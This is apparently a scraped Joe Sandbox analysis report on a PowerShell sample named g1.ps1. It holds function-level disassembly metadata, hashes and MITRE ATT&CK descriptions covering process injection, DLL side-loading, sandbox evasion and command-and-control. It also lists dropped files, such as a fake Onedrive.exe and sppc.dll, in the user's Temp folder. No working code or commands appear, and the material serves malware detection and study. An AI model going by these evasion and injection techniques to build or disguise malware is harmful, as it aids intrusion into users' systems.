Instruction ID: 7fe7fb7bb0031c15d6cbbfd21823dc751030ec24e12a41626075e9c869ccec76
Opcode Fuzzy Hash: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
Instruction Fuzzy Hash: 17018E32704F5AD5EB008F16E54446977A8FB48FE0B554135EF9C83311EE79D865C744

Function 00007FF8A031CC00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CC0B

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

Part of subcall function 00007FF8A031A8F0: _CrtIsValidPointer.LIBCMTD ref: 00007FF8A031AA28

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CC1E

Part of subcall function 00007FF8A03266B0: LeaveCriticalSection.KERNEL32 ref: 00007FF8A03266D1

Strings

Object dump complete., xrefs: 00007FF8A031CC23

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: CriticalSection__vcrt_lock$EnterLeavePointerValid
String ID: Object dump complete.
API String ID: 214106405-632625063
Opcode ID: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
Instruction ID: 8caaf46b68c436cd146e128a71fb70281fa1437d890058b0e81e1ce6edf0fb57
Opcode Fuzzy Hash: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
Instruction Fuzzy Hash: 82E0E531E2AF4361EB24AB30B45246A3695EF98390F500939EA4D42B66CE3ED4518600

Function 00007FF6104F5CEC Relevance: 5.1, APIs: 4, Instructions: 119memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6104F5DC0
HeapAlloc.KERNEL32 ref: 00007FF6104F5DD4
GetProcessHeap.KERNEL32 ref: 00007FF6104F5E2B
HeapFree.KERNEL32 ref: 00007FF6104F5E3F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
Instruction ID: 838906c170cc9de8eabca09d8d9223b46244f058ad2f1c78843fc547d3fd147f
Opcode Fuzzy Hash: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
Instruction Fuzzy Hash: 2441F832A09E46E2EE146F19548807DB69AAF85FA0B5A8434DF0E97391DF3DF4258384

Function 00007FF6104F566C Relevance: 5.1, APIs: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6104F58B1), ref: 00007FF6104F570A
HeapAlloc.KERNEL32 ref: 00007FF6104F571E
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F58B1), ref: 00007FF6104F5787
HeapFree.KERNEL32 ref: 00007FF6104F579B

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
Instruction ID: d423fc7b534d3224f0798177f44ba8c3d430a7f2117463b4102a9bcf66a26324
Opcode Fuzzy Hash: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
Instruction Fuzzy Hash: B031C836A08E46E3EF14BB19648407DB696BF88FA4F194034DA0EC7765EE3DE4658780

Function 00007FF6104F3CD4 Relevance: 5.1, APIs: 4, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF6104FD792,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D22
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D36
GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF6104FD792,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D60
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D74

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
Instruction ID: 2b06e9d76924670d382425c823c2dba6ed202f8f7cec8666649e55c2065094e2
Opcode Fuzzy Hash: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
Instruction Fuzzy Hash: AD21E372605F80DAD704DF56E94052AFBA4FB49F95B58C028DE5D83728DF38E8A6C700

Function 00007FF6104F93FC Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9425
HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9439
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9460
HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9474

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
Instruction ID: 95e427c6ce3fe14a4ffedd192fd920a50815a5b4c21e1334fc86870e26d0ea88
Opcode Fuzzy Hash: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
Instruction Fuzzy Hash: 3A112732A09A81D6EB019F66E540329BBA0FB89F99F09C138DA1D87758CF39D856C740

Function 00007FF6104F1D30 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F22BC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23D4
Part of subcall function 00007FF6104F22BC: HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23E8

GetProcessHeap.KERNEL32 ref: 00007FF6104F1D67
HeapFree.KERNEL32 ref: 00007FF6104F1D7B
GetProcessHeap.KERNEL32 ref: 00007FF6104F1D92
HeapFree.KERNEL32 ref: 00007FF6104F1DA6

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
Instruction ID: e08868759b2c29273abe999d8a9c712917a8530544a8d588a581a8e314771e14
Opcode Fuzzy Hash: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
Instruction Fuzzy Hash: 39016D32A08F41DAEB04AF56A4442A9BBA4FB89F94F488034EA4D83719DF3CD554C700

Function 00007FF6104FE210 Relevance: 5.0, APIs: 4, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE226
HeapFree.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE23B
GetProcessHeap.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE25B
HeapFree.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE270

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
Instruction ID: a45208b07dd7444db0280af3a62ca261281b186437bd1dc28ffbc9f4433fb3e4
Opcode Fuzzy Hash: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
Instruction Fuzzy Hash: 93011E32A04E82D6EF149B65E1543BDB7A4FF4DF99F49C035DA0A86359DF38D1658300

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report g1.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Onedrive.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rehemrb.20r.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwlmme2b.4eo.ps1

C:\Users\user\AppData\Local\Temp\onedrive.dll

C:\Users\user\AppData\Local\Temp\sppc.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OOQ9B3S8E5L5FDSQ29AO.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
g1.ps1

Function 00007FF8A0301010 Relevance: 63.2, APIs: 21, Strings: 15, Instructions: 226
libraryfileloaderCOMMON

Function 00007FF6104F1384 Relevance: 31.8, APIs: 21, Instructions: 308
windowCOMMON

Function 00007FF8A031B5A0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 228
memoryCOMMONLIBRARYCODE

Function 00007FF6104FE530 Relevance: 10.6, APIs: 7, Instructions: 143
sleepCOMMON

Function 00007FF8A0330510 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72
COMMON

Function 00007FF8A03015E0 Relevance: 6.1, APIs: 4, Instructions: 110
threadinjectionCOMMON

Function 00007FF8A03302D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
COMMON

Function 00007FF8A0301590 Relevance: 3.0, APIs: 2, Instructions: 18
COMMON

Function 00007FF8A0321190 Relevance: 3.0, APIs: 2, Instructions: 17
COMMON

Function 00007FF8A0301550 Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 00007FF8A0301860 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Function 00007FF8A031B500 Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Function 00007FF6104FE4E0 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Function 00007FF8A0302039 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON